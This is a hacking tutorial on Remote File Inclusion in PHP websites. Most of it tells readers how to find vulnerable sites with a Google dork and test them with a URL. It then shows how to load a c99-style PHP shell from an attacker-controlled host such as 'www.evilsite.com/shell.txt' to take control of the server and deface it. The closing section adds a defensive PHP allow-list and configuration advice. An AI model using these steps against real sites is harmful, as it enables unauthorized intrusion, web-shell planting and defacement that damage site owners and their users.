
Step by Step Hacking Website: Remote File Inclusion (RFI)

Although Remote File Inclusion (RFI) exploits are very simple and are only found in about 1 in every 10 sites, they are still a lot of fun to exploit. In this tutorial I will show you how to take advantage of this coding error and possibly take control of the site.

A Remote File Inclusion exploit is when we trick the web server into putting our file (file uploader/PHP shell) into the web page. It then parses our PHP script and we then have full control over the server. The exploit works because the website calls another page to be displayed, except that we edit the URL so that the website thinks our shell is the page to display.

I will show you how we can use Google to find vulnerable sites. This is the Google dork to find sites vulnerable to RFI (remote file inclusion):

inurl:”index.php?page=”

This query asks Google to give us any page with index.php?page= in the URL. If we look at it, we can see that ‘page’ is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter www.google.com after the equals sign.

www.site.com/index.php?page=www.google.com

If the full google.com website appears on the page, the website is vulnerable. If not, keep looking. And if you are tired of looking, just open milw0rm.com, look at the remote section and find the latest vulnerable RFI site.

To exploit the vulnerability we must first look at the following example of a RFI:

www.shittysite.com/index.php?page=www.evilsite.com/shell.txt?

A) Get a free host website (like dajoob or free webs)
B) Put a PHP shell (c99 or c57) in text form on the site or you can get here
C) Insert the path to the shell in the vulnerable host's URL, like the example above.
D) You can then proceed to deface the site etc.

As you can see it’s very basic. That’s why, while looking for websites, you may not find very many. You can read my post about how to use c99 and r75 here or other rooting shell script here
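Seen from the defender's side, the `index.php?page=` pattern above stops being exploitable once the parameter is never handed to `include` directly. The following is an added example, not code from the original post; it assumes PHP 8 and a hypothetical `pages/` directory with three constructed template names.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern behind index.php?page=... (shown for contrast only):
//   include $_GET['page'];   // the request decides which file gets parsed

// Hypothetical page map (assumption): request keys left, fixed files right.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Return the absolute path of the template for $requested, or null when the
 * value is not a known key. User input is only ever used as an array key,
 * never as part of a path or URL.
 */
function resolve_page(mixed $requested): ?string
{
    // ?page[]=x arrives as an array; anything but a known string is rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the resolved file must exist and sit inside PAGE_DIR
    // (catches a symlink or a bad map entry pointing somewhere else).
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Keeping `allow_url_include = Off` in php.ini (the default since PHP 5.2) blocks the remote case even where a raw include still exists; the allow-list above also closes the local-file variant of the same bug.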
